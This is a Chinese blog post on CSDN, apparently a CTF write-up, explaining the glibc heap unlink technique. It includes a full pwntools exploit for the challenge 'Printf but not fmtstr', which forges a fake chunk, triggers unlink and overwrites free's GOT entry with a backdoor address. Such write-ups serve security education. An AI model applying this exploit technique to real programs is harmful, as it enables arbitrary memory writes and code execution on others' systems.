Unlink小记

于 2024-10-02 09:27:33 发布
阅读量456 收藏 6
点赞数 9
分类专栏: CTF 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79696060/article/details/142674620
版权

简介:通过unsortedbin的脱链操作,即链表头处free的堆块从unsortedbin中脱离然后前向或后向合并为一个新的大堆块再放进unsortedbin中

原理:伪造fake_chunk处于free状态,构造fd和bk指针,从而绕过unlink检查实现向p位置写入p-0x18,一般构造fake_bk=p-0x10,fake_fd=p-0x18

利用条件:堆溢出,off_by_one/null修改使用标志位,uaf等均可

什么时候利用:bss段或其他地方有堆管理的地址

如何伪造及其效果:

(借用一下星盟师傅的图片)

例题:[羊城杯 2023 决赛]Printf but not fmtstr

本题add只允许0x500-0x900大小的堆块,且free后没有置零,edit依旧可以对free的堆块操作

并且malloc的堆块地址会存放于bss段,符合unlink的条件

先做好自动化交互

from pwn import *

def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def debug():
    gdb.attach(p)
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
# def get_sb():
#     return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
context(os='linux', arch='amd64', log_level='debug')
p = process("./pwn")
# p = remote("node4.anna.nssctf.cn", 28924)
libc = ELF("./libc.so.6")
elf = ELF('./pwn')

def add(idx, size):
    sl(b'1')
    sla(b"Index: ", str(idx))
    sla(b'Size: ', str(size))
def delete(idx):
    sl(b'2')
    sla(b'Index: ', str(idx))
def edit(idx, content):
    sl(b'3')
    sla(b'Index: ', str(idx))
    sa(b'Content: ', content)
def show(idx):
    sl(b'4')
    sla(b'Index: ', str(idx))

因为我们没有off_by_one/null或者堆溢出,无法改掉下一个chunk的in_use位,但是我们可以通过堆风水构造出fake_chunk,我们先申请三块0x500大小的chunk,然后free掉0,1

add(0,0x500)
add(1,0x500)
add(2,0x500)

delete(0)
delete(1)

add(3,0x510)

 此时,chunk0和chunk1会合并为1个大堆块,我们此时再申请0x510大小的chunk,此时在free掉的chunk1的data域中就会出现我们类似已free的fake_chunk(其实是真正的从unsortedbin中切割下来的chunk,但是为了更好描述,我们称其为fake_chunk),同时,第二个堆块的pre_inuse位为0,pre_size也为0x500,符合我们unlink的条件,然后我们通过edit chunk1修改fake_chunk的fake_chunk的fd和bk,之后再free掉chunk2就会实现unlink操作,接下来就是改got表为backdoor即可

backdoor = 0x4011D6
target_addr = 0x4040E8
fake_bk = target_addr - 0x10
fake_fd = target_addr - 0x18

edit(1, p64(0)+p64(0x500)+p64(fake_fd)+p64(fake_bk))

delete(2)
edit(1,(p64(0) * 2 + p64(elf.got['free'])))

edit(0,p64(backdoor))
delete(1)

inter()

关于其他的unlink利用,如off_by_one/null和堆溢出可以参考星盟师傅的,讲的很详细

Hertant
关注
专栏目录
socket小记
zf7226502的博客
04-07 161
                 服务端:                                                                                                       客户端   socket_fd  = socket( PF_ ,SOCK_  , )   :定义文件描述符                s...
node小记
Nieyigo的博客
12-04 154
Buffer缓冲区 通俗点来说就是一个暂时储存用户发送的请求信息,和服务器未发现响应之前的响应信息,内部已二进制存储但是以十六进制显示。 fs文件系统(File System) 就是node通过引用fs模块对电脑里面的文件可以进行一系列增删改的操作等。如果笔记有荣幸被网上的兄弟看到,那这里把模块的引入讲一下,就是 cosnt fs = require('fs'),node引入文件就是这样require后面跟需要引入的模块名字,如果是引入自己创建的模块,那填写的就是相对路径,npm下载的模块也是只要填名字就
Linux 应用小记
newCraftsman的博客
07-30 181
Linux常用命令 解压、压缩 linux tar.gz zip 解压缩 压缩命令 used cat diff_train_set | cut -f2 | LANG=utf-8 sort | uniq -c > en sort en -n -r -o en_sort cat yugu_terms | awk -F"\t" '{if($2=="-"){print}}' | wc -l ps aux | grep 'recall_seq.py' watch -n 1 nvidia-smi grep '
linkedList小记
weixin_43328357的博客
12-30 230
linkedList小记 linkedList继承关系图 field属性 //集合大小 transient int size = 0; //上一个节点 transient Node<E> first; //下一个节点 transient Node<E> last; Node private class Node<E> { ...
Java LinkedList小记
weixin_30306905的博客
05-23 77
1. 基本用法   LinkedList实现了List、Deque、Queue接口,可以按照队列、栈和双端队列的方式进行操作。LinkedList有两个构造方法,一个是默认构造,另一个接受Collection: public LinkedList() public LinkedList(Collection<? extends E> c)   可以按照List操作...
python小记
weixin_33711647的博客
04-16 256
查找替换 ctrl + r注释 ctrl+/格式化代码 ctrl+alt+l 跳转到定义 ctrl+alt+b 常用数据类型 数值类型:int float是两个比较常用的数值类型。Bool类型。String类型。'vichin' "vichin" """vichin""" '''vichin''' content = """ 中国 人民 站起...
Node.js 小记
琳小的博客
11-14 219
下面来简单说下有关Node.js的基础; 安装node.js就不赘述了,require函数用于获取、加载模块,exports用于模块的导出; 创建服务器: var http=require("http");//使用require指令来导入http模块 http.createServer(function(request,response){//创建http server ,传入回调函数 ...
PHPEXCEL 小记
weixin_30867015的博客
01-05 48
首先是使用PHP Reader 读取Excle内容: 1 require("http://www.cnblogs.com/PHPExcel/Classes/PHPExcel.php"); 2 $file = "D:\\datas.xlsx"; 3 if(!file_exists($file)){ 4 die("no file found in {$file}")...
FIFO之小记
Jason's BLOG
07-18 445
把AUP上的FIFO小节又重温了一下,有几个问题需要注意: 1. open fifo时的顺序问题(只有当该FIFO为已写打开后,才可读) 2. open fifo时的EEXIST错误码处理(如果FIFO不存在我们才创建,否则直接打开用即可) 3.从FIFO中读数据的连续性(系统调用的原因(缓冲区)) 写了个测试小程序: #include #include #include #inc
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
Linux unlink函数和删除文件的操作方法
01-09
在Linux系统中,`unlink`函数是用于删除文件或软链接的关键函数。它遵循特定的规则来决定何时真正从磁盘上移除文件内容。理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `...
给项目添加依赖:报错operation not permitted, unlink.原来是4048
01-20
syscall unlink npm ERR! path D:\Users\Megan\企业微信下载地址\WXWork\1688850487518406\Cache\File\2020-02\cmall-back1\node_modules\.staging\echarts-2100c70a\dist\echarts.js npm ERR! errno -4048 npm ERR...
npm报错error code EPERM, error syscall unlink,errno -4048解决
01-08
安装报错信息 24741 error code EPERM 24742 error syscall unlink ...24745 error Error: EPERM: operation not permitted, unlink 'E:\workspaces\multiplatform\node_modules\.staging\regexpp-c7c4
node.js中的fs.unlink方法使用说明
10-25
在fs模块中,fs.unlink方法用于删除文件。 使用fs.unlink方法之前,首先需要引入fs模块。通过require方法引入fs模块,例如var fs = require('fs')。引入模块后,fs unlink方法可以被调用执行删除文件的操作。fs....
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8482
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 719
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 607
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
最新发布
weixin_64446270的博客
09-27 1380
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
unlink函数
05-24
unlink函数是一个系统调用,用于删除指定的文件名。它的原型如下: ```c #include <unistd.h> int unlink(const char *pathname); ``` 其中,pathname表示要删除的文件名。 使用unlink函数删除文件时,需要注意以下几点: 1. 如果文件不存在,将会返回一个错误。 2. 如果文件被其他进程打开或锁定,unlink函数将无法删除该文件。 3. 如果文件被删除后仍有进程打开,该文件的内容将继续存在于磁盘中,直到所有进程关闭该文件。 另外,unlink函数删除的是文件名,而不是文件本身。如果文件名对应的文件有多个硬链接,只有当所有硬链接都被删除后,文件才会真正被删除。 在使用unlink函数时,需要小心操作,避免误删重要文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值